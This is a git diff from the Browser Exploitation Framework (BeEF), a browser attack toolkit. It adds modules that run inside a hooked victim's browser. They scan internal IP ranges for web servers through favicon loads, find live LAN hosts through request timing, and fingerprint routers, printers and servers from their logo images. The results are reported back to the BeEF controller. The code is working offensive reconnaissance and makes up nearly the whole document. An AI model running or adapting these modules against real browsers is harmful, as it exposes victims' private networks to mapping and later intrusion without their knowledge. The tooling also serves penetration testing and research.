+ end
+ end
+ end
+
end
def self.options
diff --git a/modules/network/get_http_servers/command.js b/modules/network/get_http_servers/command.js
new file mode 100644
index 000000000..c1e9eabfb
--- /dev/null
+++ b/modules/network/get_http_servers/command.js
@@ -0,0 +1,124 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var ips = new Array();
+ var proto = 'http';
+ var ipRange = "<%= @ipRange %>";
+ var port = "<%= @rport %>";
+ var timeout = "<%= @timeout %>";
+ var wait = "<%= @wait %>";
+ var threads = "<%= @threads %>";
+ var urls = new Array('/favicon.ico', '/favicon.png', '/images/favicon.ico', '/images/favicon.png');
+
+ // set target IP addresses
+ if (ipRange == 'common') {
+ // use default IPs
+ ips = [
+ '192.168.0.1',
+ '192.168.0.100',
+ '192.168.0.254',
+ '192.168.1.1',
+ '192.168.1.100',
+ '192.168.1.254',
+ '10.0.0.1',
+ '10.1.1.1',
+ '192.168.2.1',
+ '192.168.2.254',
+ '192.168.100.1',
+ '192.168.100.254',
+ '192.168.123.1',
+ '192.168.123.254',
+ '192.168.10.1',
+ '192.168.10.254'
+ ];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
+ // ipRange will be in the form of 192.168.0.1-192.168.0.254
+ // the fourth octet will be iterated.
+ // (only C class IP ranges are supported atm)
+ ipBounds = ipRange.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (i=lowerBound;i<=upperBound;i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
+ }
+
+ checkFavicon = function(proto, ip, port, uri) {
+ var img = new Image;
+ var dom = beef.dom.createInvisibleIframe();
+ beef.debug("[Favicon Scanner] Checking IP [" + ip + "] (" + proto + ")");
+ img.src = proto+"://"+ip+":"+port+uri;
+ img.onerror = function() { dom.removeChild(this); }
+ img.onload = function() {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+"&url="+escape(this.src));dom.removeChild(this);
+ beef.debug("[Favicon Scanner] Found HTTP Server [" + escape(this.src) + "]");
+ }
+ dom.appendChild(img);
+ // stop & remove iframe
+ setTimeout(function() {
+ if (dom.contentWindow.stop !== undefined) {
+ dom.contentWindow.stop();
+ } else if (dom.contentWindow.document.execCommand !== undefined) {
+ dom.contentWindow.document.execCommand("Stop", false);
+ }
+ document.body.removeChild(dom);
+ }, timeout*1000);
+ }
+
+ WorkerQueue = function(frequency) {
+
+ var stack = [];
+ var timer = null;
+ var frequency = frequency;
+ var start_scan = (new Date).getTime();
+
+ this.process = function() {
+ var item = stack.shift();
+ eval(item);
+ if (stack.length === 0) {
+ clearInterval(timer);
+ timer = null;
+ var interval = (new Date).getTime() - start_scan;
+ beef.debug("[Favicon Scanner] Worker queue is complete ["+interval+" ms]");
+ return;
+ }
+ }
+
+ this.queue = function(item) {
+ stack.push(item);
+ if (timer === null) {
+ timer = setInterval(this.process, frequency);
+ }
+ }
+
+ }
+
+ // create worker queue
+ var workers = new Array();
+ for (w=0; w < threads; w++) {
+ workers.push(new WorkerQueue(wait*1000));
+ }
+
+ // for each favicon path
+ for (var u=0; u < urls.length; u++) {
+ var worker = workers[u % threads];
+ // for each LAN IP address
+ for (var i=0; i < ips.length; i++) {
+ worker.queue('checkFavicon("'+proto+'","'+ips[i]+'","'+port+'","'+urls[u]+'");');
+ }
+ }
+
+});
+
diff --git a/modules/network/get_http_servers/config.yaml b/modules/network/get_http_servers/config.yaml
new file mode 100644
index 000000000..7ef33d540
--- /dev/null
+++ b/modules/network/get_http_servers/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ get_http_servers:
+ enable: true
+ category: "Network"
+ name: "Get HTTP Servers (Favicon)"
+ description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
+ authors: ["bcoles"]
+ target:
+ user_notify: ["FF", "IE", "C", "S"]
diff --git a/modules/network/get_http_servers/module.rb b/modules/network/get_http_servers/module.rb
new file mode 100644
index 000000000..4afcd1d01
--- /dev/null
+++ b/modules/network/get_http_servers/module.rb
@@ -0,0 +1,46 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Get_http_servers < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
+ {'name' => 'rport', 'ui_label' => 'Port', 'value' => '80'},
+ {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'},
+ {'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '1'},
+ {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'}
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['url'] = @datastore['url'] if not @datastore['url'].nil?
+ if content.empty?
+ content['fail'] = 'No HTTP servers were discovered.'
+ end
+ save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&url=(.+)/
+ proto = $1
+ ip = $2
+ port = $3
+ url = $4
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found HTTP Server [proto: #{proto}, ip: #{ip}, port: #{port}]")
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => "HTTP Server", :cid => cid)
+ r.save
+ end
+ end
+
+ end
+
+ end
+end
diff --git a/modules/network/identify_lan_subnets/command.js b/modules/network/identify_lan_subnets/command.js
new file mode 100644
index 000000000..a4347324d
--- /dev/null
+++ b/modules/network/identify_lan_subnets/command.js
@@ -0,0 +1,123 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ if(!beef.browser.isFF() && !beef.browser.isC()){
+ beef.debug("[command #<%= @command_id %>] Browser is not supported.");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser");
+ }
+
+ var min_timeout = 500;
+ var ranges = [
+ '192.168.0.0',
+ '192.168.1.0',
+ '192.168.2.0',
+ '192.168.10.0',
+ '192.168.100.0',
+ '192.168.123.0',
+ '10.0.0.0',
+ '10.0.1.0',
+ '10.1.1.0',
+ '10.10.10.0',
+ '172.16.0.0',
+ '172.16.1.0'
+ ];
+
+var doScan = function(timeout) {
+
+ var discovered_hosts = [];
+ var proto = "http";
+
+ var doRequest = function(host) {
+ var d = new Date;
+ var xhr = new XMLHttpRequest();
+ xhr.timeout = timeout;
+ xhr.onreadystatechange = function(){
+ if(xhr.readyState == 4){
+ var time = new Date().getTime() - d.getTime();
+ var aborted = false;
+ // if we call window.stop() the event triggered is 'abort'
+ // http://www.w3.org/TR/XMLHttpRequest/#event-handlers
+ xhr.onabort = function(){
+ aborted = true;
+ }
+ xhr.onloadend = function(){
+ if(time < timeout){
+ // 'abort' fires always before 'onloadend'
+ if(time > 1 && aborted === false){
+ beef.debug('Discovered host ['+host+'] in ['+time+'] ms');
+ discovered_hosts.push(host);
+ }
+ }
+ }
+ }
+ }
+ xhr.open("GET", proto + "://" + host, true);
+ xhr.send();
+ }
+
+ var requests = new Array();
+ for (var i = 0; i < ranges.length; i++) {
+ // the following returns like 192.168.0.
+ var c = ranges[i].split('.')[0]+'.'+
+ ranges[i].split('.')[1]+'.'+
+ ranges[i].split('.')[2]+'.';
+ // for every entry in the 'ranges' array, request
+ // the most common gateway IPs, like:
+ // 192.168.0.1, 192.168.0.100, 192.168.0.254
+ requests.push(c + '1');
+ requests.push(c + '100');
+ requests.push(c + '254');
+ }
+
+ // process queue
+ var count = requests.length;
+ beef.debug("[command #<%= @command_id %>] Identifying LAN hosts ("+count+" URLs) (Timeout " + timeout + "ms)");
+ var check_timeout = (timeout * count + parseInt(timeout,10));
+ var handle = setInterval(function() {
+ if (requests.length > 0) {
+ doRequest(requests.pop());
+ }
+ }, timeout);
+
+ // check for results
+ checkResults = function() {
+
+ if (handle) {
+ beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
+ clearInterval(handle);
+ handle = 0;
+ }
+
+ var hosts = discovered_hosts.join(",");
+ beef.debug("Discovered " + discovered_hosts.length + " hosts: " + hosts);
+ if (discovered_hosts.length >= 5) {
+ // if we get 5+ results something probably went wrong. this happens sometimes.
+ if (timeout > min_timeout) {
+ // if timeout is more than 500ms then decrease timeout by 500ms and try again
+ beef.debug("Returned large hit rate (" + discovered_hosts.length + " of " + count + ") indicating low network latency. Retrying scan with decreased timeout (" + (timeout - 500) + "ms)");
+ doScan(timeout-500);
+ } else {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unexpected results&hosts="+hosts);
+ }
+ } else if (discovered_hosts.length == 0) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no results");
+ } else {
+ beef.debug("[command #<%= @command_id %>] Identifying LAN hosts completed.");
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'hosts='+hosts);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
+ }
+ }
+ setTimeout("checkResults();", check_timeout);
+
+}
+
+var timeout = "<%= @timeout %>";
+if (isNaN(timeout) || timeout < 1) timeout = min_timeout;
+doScan(parseInt(timeout,10));
+
+});
diff --git a/modules/network/identify_lan_subnets/config.yaml b/modules/network/identify_lan_subnets/config.yaml
new file mode 100644
index 000000000..859adabd1
--- /dev/null
+++ b/modules/network/identify_lan_subnets/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ identify_lan_subnets:
+ enable: true
+ category: "Network"
+ name: "Identify LAN Subnets"
+ description: "Discover active hosts in the internal network(s) of the hooked browser. This module works by attempting to connect to commonly used LAN IP addresses and timing the response."
+ authors: ["browserhacker.com"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE", "S", "O"]
diff --git a/modules/network/identify_lan_subnets/module.rb b/modules/network/identify_lan_subnets/module.rb
new file mode 100644
index 000000000..51aa7ca93
--- /dev/null
+++ b/modules/network/identify_lan_subnets/module.rb
@@ -0,0 +1,48 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+##
+# Ported to BeEF from: http://browserhacker.com/code/Ch10/index.html
+##
+
+class Identify_lan_subnets < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'timeout', 'ui_label' => 'Timeout for each request (ms)', 'value' => '500'}
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['host'] = @datastore['host'] if not @datastore['host'].nil?
+ content['hosts'] = @datastore['hosts'] if not @datastore['hosts'].nil?
+ if content.empty?
+ content['fail'] = 'No active hosts have been discovered.'
+ end
+ save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # log the network hosts
+ if @datastore['results'] =~ /^hosts=([\d\.,]+)/
+ hosts = "#{$1}"
+ hosts.split(',').flatten.each do |ip|
+ next if ip.nil?
+ next unless ip.to_s =~ /^([\d\.]+)$/
+ print_debug("Hooked browser found host #{ip}")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
+ r.save
+ end
+ end
+ end
+
+ end
+
+end
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index 79565b7e3..0eff974dc 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -17,19 +17,8 @@ beef.execute(function() {
ports = ports.split(',');
}
- // set target LAN IP addresses
- if (ipRange != null){
- // ipRange will be in the form of 192.168.0.1-192.168.0.254
- // the fourth octet will be iterated.
- // (only C class IP ranges are supported atm)
- ipBounds = ipRange.split('-');
- lowerBound = ipBounds[0].split('.')[3];
- upperBound = ipBounds[1].split('.')[3];
- for (i=lowerBound;i<=upperBound;i++){
- ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
- ips.push(ipToTest);
- }
- } else {
+ // set target IP addresses
+ if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
@@ -49,6 +38,23 @@ beef.execute(function() {
'192.168.10.1',
'192.168.10.254'
];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
+ // ipRange will be in the form of 192.168.0.1-192.168.0.254
+ // the fourth octet will be iterated.
+ // (only C class IP ranges are supported atm)
+ ipBounds = ipRange.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (i=lowerBound;i<=upperBound;i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
}
/* Signatures in the form of:
@@ -106,6 +112,10 @@ beef.execute(function() {
"Billion Router",
"80","http",false,
"/customized/logo.gif",224,55),
+ new Array(
+ "Netgear N300 Router",
+ "80","http",false,
+ "/settings.gif",750,85),
new Array(
"Linksys NAS",
"80","http",false,
@@ -198,6 +208,14 @@ beef.execute(function() {
"HP Printer Photosmart series",
"80","http",false,
"/webApps/images/hp_d_rgb_m.gif",50,50),
+ new Array(
+ "Lexmark Printer",
+ "80","http",false,
+ "/images/lexlogo.gif",153,115),
+ new Array(
+ "Canon Printer",
+ "8000","http",false,
+ "/login/image/canonlogo.gif",100,37),
new Array(
"Zenoss",
"8080","http",false,
@@ -214,22 +232,40 @@ beef.execute(function() {
"pfSense",
"443","https",false,
"/themes/pfsense_ng/images/logo.gif",200,56),
+ new Array(
+ "Apache Tomcat",
+ "8080","http",true,
+ "/docs/images/tomcat.gif",146,92),
new Array(
"Jenkins",
"80","http",false,
"/static/"+Math.random().toString(36).substring(2,10)+"/images/jenkins.png",240,323),
+ new Array(
+ "SAP NetWeaver",
+ "80","http",true,
+ "/logon/layout/shadow.jpg",18,4),
+ new Array(
+ "Netscape iPlanet",
+ "80","http",true,
+ "/mc-icons/menu.gif",21,18),
new Array(
"m0n0wall",
"80","http",false,
- "/logo.gif",150,47)
+ "/logo.gif",150,47),
+ new Array("SMC Router","80","http",false,"/images/logo.gif",133,59)
// Uncommon signatures
+//new Array("Citrix MetaFrame", "80", "http", false, "/Citrix/MetaFrameXP/default/media/nfusehead.gif",230,41),
+//new Array("Oracle E-Business Suite","80","http",false,"/OA_MEDIA/FNDSSCORP.gif",134,31),
+//new Array("OracleAS Reports Service","80","http",false,"/reports/images/oraclelogo_sizewithprodbrand.gif",133,20),
+//new Array("Oracle iLearning","80","http",false,"/ilearn/en/shared/img/coin_help_ready.gif",60,32),
+//new Array("RSA Self-Service Console", "80", "http",false,"/console-selfservice/images/default/icn_help.gif",14,14),
+//new Array("Sambar Server", "80", "http",false,"/sysimage/system/powerby.gif",41,23),
//new Array("BeEF","3000","http",false,"/ui/media/images/beef.png",200,149),
//new Array("BeEF (PHP)","80","http",false,"/beef/images/beef.gif",32,32),
//new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
//new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98),
//new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9),
-//new Array("SMC Networks","80","http",false,"/images/logo.gif",133,59),
//new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60),
//new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30),
);
@@ -244,7 +280,7 @@ beef.execute(function() {
img.onerror = function() { dom.removeChild(this); }
img.onload = function() {
if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) {
- beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+'&discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this);
beef.debug("[Network Fingerprint] Found [" + signature_name + "] with URL [" + escape(this.src) + "]");
}
}
diff --git a/modules/network/internal_network_fingerprinting/config.yaml b/modules/network/internal_network_fingerprinting/config.yaml
index 77f6d75b4..34173741a 100644
--- a/modules/network/internal_network_fingerprinting/config.yaml
+++ b/modules/network/internal_network_fingerprinting/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Fingerprint Local Network"
- description: "Discover devices and applications in the victim's Local Area Network.
This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.
Partially based on Yokosou and jslanscanner."
+ description: "Discover devices and applications in the victim's Local Area Network.
This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.
Partially based on Yokosou and jslanscanner.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles", "wade", "antisnatchor"]
target:
user_notify: ["FF", "IE", "C", "S"]
diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb
index 971e02e83..cb928e86f 100644
--- a/modules/network/internal_network_fingerprinting/module.rb
+++ b/modules/network/internal_network_fingerprinting/module.rb
@@ -24,5 +24,25 @@ class Internal_network_fingerprinting < BeEF::Core::Command
content['fail'] = 'No devices/applications have been discovered.'
end
save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&discovered=(.+)&url=(.+)/
+ proto = $1
+ ip = $2
+ port = $3
+ discovered = $4
+ url = $5
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found '#{discovered}' [ip: #{ip}]")
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => discovered, :cid => cid)
+ r.save
+ end
+ end
+
+ end
+
end
end
diff --git a/modules/network/jslanscanner/command.js b/modules/network/jslanscanner/command.js
new file mode 100644
index 000000000..a20f5a529
--- /dev/null
+++ b/modules/network/jslanscanner/command.js
@@ -0,0 +1,410 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+// Ported to BeEF from jslanscanner: https://code.google.com/p/jslanscanner/source/browse/trunk/lan_scan/js/lan_scan.js
+
+beef.execute(function() {
+
+ if(!beef.browser.isFF() && !beef.browser.isS()){
+ beef.debug("[command #<%= @command_id %>] Browser is not supported.");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser");
+ }
+
+//------------------------------------------------------------------------------------------
+// LAN SCANNER created by Gareth Heyes (gareth at businessinfo co uk)
+// Blog: www.thespanner.co.uk
+// Labs site : www.businessinfo.co.uk
+// Version 2.1
+//------------------------------------------------------------------------------------------
+
+/* Copyright 2007 Gareth Heyes (email : gareth[at]NOSPAM businessinfo(dot)(co)(dot)uk
+
+ This program is free software; you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation; either version 2 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program; if not, write to the Free Software
+ Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
+*/
+
+ var devices = [
+ {make:'DLink',model:'dgl4100',graphic:'/html/images/dgl4100.jpg'},
+ {make:'DLink',model:'dgl4300',graphic:'/html/images/dgl4300.jpg'},
+ {make:'DLink',model:'di524',graphic:'/html/images/di524.jpg'},
+ {make:'DLink',model:'di624',graphic:'/html/images/di624.jpg'},
+ {make:'DLink',model:'di624s',graphic:'/html/images/di624s.jpg'},
+ {make:'DLink',model:'di724gu',graphic:'/html/images/di724gu.jpg'},
+ {make:'DLink',model:'dilb604',graphic:'/html/images/dilb604.jpg'},
+ {make:'DLink',model:'dir130',graphic:'/html/images/dir130.jpg'},
+ {make:'DLink',model:'dir330',graphic:'/html/images/dir330.jpg'},
+ {make:'DLink',model:'dir450',graphic:'/html/images/dir450.jpg'},
+ {make:'DLink',model:'dir451',graphic:'/html/images/dir451.jpg'},
+ {make:'DLink',model:'dir615',graphic:'/html/images/dir615.jpg'},
+ {make:'DLink',model:'dir625',graphic:'/html/images/dir625.jpg'},
+ {make:'DLink',model:'dir635',graphic:'/html/images/dir635.jpg'},
+ {make:'DLink',model:'dir655',graphic:'/html/images/dir655.jpg'},
+ {make:'DLink',model:'dir660',graphic:'/html/images/dir660.jpg'},
+ {make:'DLink',model:'ebr2310',graphic:'/html/images/ebr2310.jpg'},
+ {make:'DLink',model:'kr1',graphic:'/html/images/kr1.jpg'},
+ {make:'DLink',model:'tmg5240',graphic:'/html/images/tmg5240.jpg'},
+ {make:'DLink',model:'wbr1310',graphic:'/html/images/wbr1310.jpg'},
+ {make:'DLink',model:'wbr2310',graphic:'/html/images/wbr2310.jpg'},
+ {make:'DLink',model:'dsl604',graphic:'/html/images/dsl604.jpg'},
+ {make:'DLink',model:'dsl2320b',graphic:'/html/images/dsl2320b.jpg'},
+ {make:'DLink',model:'dsl2540b',graphic:'/html/images/dsl2540b.jpg'},
+ {make:'DLink',model:'dsl2640b',graphic:'/html/images/dsl2640b.jpg'},
+ {make:'DLink',model:'dsl302g',graphic:'/html/images/dsl302g.jpg'},
+ {make:'DLink',model:'dsl502g',graphic:'/html/images/dsl502g.jpg'},
+ {make:'DLink',model:'dgl3420',graphic:'/html/images/dgl3420.jpg'},
+ {make:'DLink',model:'dwl2100ap',graphic:'/html/images/dwl2100ap.jpg'},
+ {make:'DLink',model:'dwl2130ap',graphic:'/html/images/dwl2130ap.jpg'},
+ {make:'DLink',model:'dwl2200ap',graphic:'/html/images/dwl2200ap.jpg'},
+ {make:'DLink',model:'dwl2230ap',graphic:'/html/images/dwl2230ap.jpg'},
+ {make:'DLink',model:'dwl2700ap',graphic:'/html/images/dwl2700ap.jpg'},
+ {make:'DLink',model:'dwl3200ap',graphic:'/html/images/dwl3200ap.jpg'},
+ {make:'DLink',model:'dwl7100ap',graphic:'/html/images/dwl7100ap.jpg'},
+ {make:'DLink',model:'dwl7130ap',graphic:'/html/images/dwl7130ap.jpg'},
+ {make:'DLink',model:'dwl7200ap',graphic:'/html/images/dwl7200ap.jpg'},
+ {make:'DLink',model:'dwl7230ap',graphic:'/html/images/dwl7230ap.jpg'},
+ {make:'DLink',model:'dwl7700ap',graphic:'/html/images/dwl7700ap.jpg'},
+ {make:'DLink',model:'dwl8200ap',graphic:'/html/images/dwl8200ap.jpg'},
+ {make:'DLink',model:'dwl8220ap',graphic:'/html/images/dwl8220ap.jpg'},
+ {make:'DLink',model:'dwlag132',graphic:'/html/images/dwlag132.jpg'},
+ {make:'DLink',model:'dwlag530',graphic:'/html/images/dwlag530.jpg'},
+ {make:'DLink',model:'dwlag660',graphic:'/html/images/dwlag660.jpg'},
+ {make:'DLink',model:'dwlag700ap',graphic:'/html/images/dwlag700ap.jpg'},
+ {make:'DLink',model:'dwlg120',graphic:'/html/images/dwlg120.jpg'},
+ {make:'DLink',model:'dwlg122',graphic:'/html/images/dwlg122.jpg'},
+ {make:'DLink',model:'dwlg132',graphic:'/html/images/dwlg132.jpg'},
+ {make:'DLink',model:'dwlg510',graphic:'/html/images/dwlg510.jpg'},
+ {make:'DLink',model:'dwlg520',graphic:'/html/images/dwlg520.jpg'},
+ {make:'DLink',model:'dwlg520m',graphic:'/html/images/dwlg520m.jpg'},
+ {make:'DLink',model:'dwlg550',graphic:'/html/images/dwlg550.jpg'},
+ {make:'DLink',model:'dwlg630',graphic:'/html/images/dwlg630.jpg'},
+ {make:'DLink',model:'dwlg650',graphic:'/html/images/dwlg650.jpg'},
+ {make:'DLink',model:'dwlg650m',graphic:'/html/images/dwlg650m.jpg'},
+ {make:'DLink',model:'dwlg680',graphic:'/html/images/dwlg680.jpg'},
+ {make:'DLink',model:'dwlg700ap',graphic:'/html/images/dwlg700ap.jpg'},
+ {make:'DLink',model:'dwlg710',graphic:'/html/images/dwlg710.jpg'},
+ {make:'DLink',model:'dwlg730ap',graphic:'/html/images/dwlg730ap.jpg'},
+ {make:'DLink',model:'dwlg820',graphic:'/html/images/dwlg820.jpg'},
+ {make:'DLink',model:'wda1320',graphic:'/html/images/wda1320.jpg'},
+ {make:'DLink',model:'wda2320',graphic:'/html/images/wda2320.jpg'},
+ {make:'DLink',model:'wna1330',graphic:'/html/images/wna1330.jpg'},
+ {make:'DLink',model:'wna2330',graphic:'/html/images/wna2330.jpg'},
+ {make:'DLink',model:'wua1340',graphic:'/html/images/wua1340.jpg'},
+ {make:'DLink',model:'wua2340',graphic:'/html/images/wua2340.jpg'},
+ {make:'DLink',model:'DSL502T',graphic:'/html/images/help_p.jpg'},
+ {make:'DLink',model:'DSL524T',graphic:'/html/images/device.gif'},
+ {make:'Netgear',model:'CG814WG',graphic:'/images/../settingsCG814WG.gif'},
+ {make:'Netgear',model:'CM212',graphic:'/images/../settingsCM212.gif'},
+ {make:'Netgear',model:'DG632',graphic:'/images/../settingsDG632.gif'},
+ {make:'Netgear',model:'DG632B',graphic:'/images/../settingsDG632B.gif'},
+ {make:'Netgear',model:'DG814',graphic:'/images/../settingsDG814.gif'},
+ {make:'Netgear',model:'DG824M',graphic:'/images/../settingsDG824M.gif'},
+ {make:'Netgear',model:'DG834',graphic:'/images/../settingsDG834.gif'},
+ {make:'Netgear',model:'DG834B',graphic:'/images/../settingsDG834B.gif'},
+ {make:'Netgear',model:'DG834G',graphic:'/images/../settingsDG834G.gif'},
+ {make:'Netgear',model:'DG834GB',graphic:'/images/../settingsDG834GB.gif'},
+ {make:'Netgear',model:'DG834GT',graphic:'/images/../settingsDG834GT.gif'},
+ {make:'Netgear',model:'DG834GTB',graphic:'/images/../settingsDG834GTB.gif'},
+ {make:'Netgear',model:'DG834GV',graphic:'/images/../settingsDG834GV.gif'},
+ {make:'Netgear',model:'dg834N',graphic:'/images/../settingsdg834N.gif'},
+ {make:'Netgear',model:'DG834PN',graphic:'/images/../settingsDG834PN.gif'},
+ {make:'Netgear',model:'DGFV338',graphic:'/images/../settingsDGFV338.gif'},
+ {make:'Netgear',model:'DM111P',graphic:'/images/../settingsDM111P.gif'},
+ {make:'Netgear',model:'DM602',graphic:'/images/../settingsDM602.gif'},
+ {make:'Netgear',model:'FM114P',graphic:'/images/../settingsFM114P.gif'},
+ {make:'Netgear',model:'FR114P',graphic:'/images/../settingsFR114P.gif'},
+ {make:'Netgear',model:'FR114W',graphic:'/images/../settingsFR114W.gif'},
+ {make:'Netgear',model:'FR314',graphic:'/images/../settingsFR314.gif'},
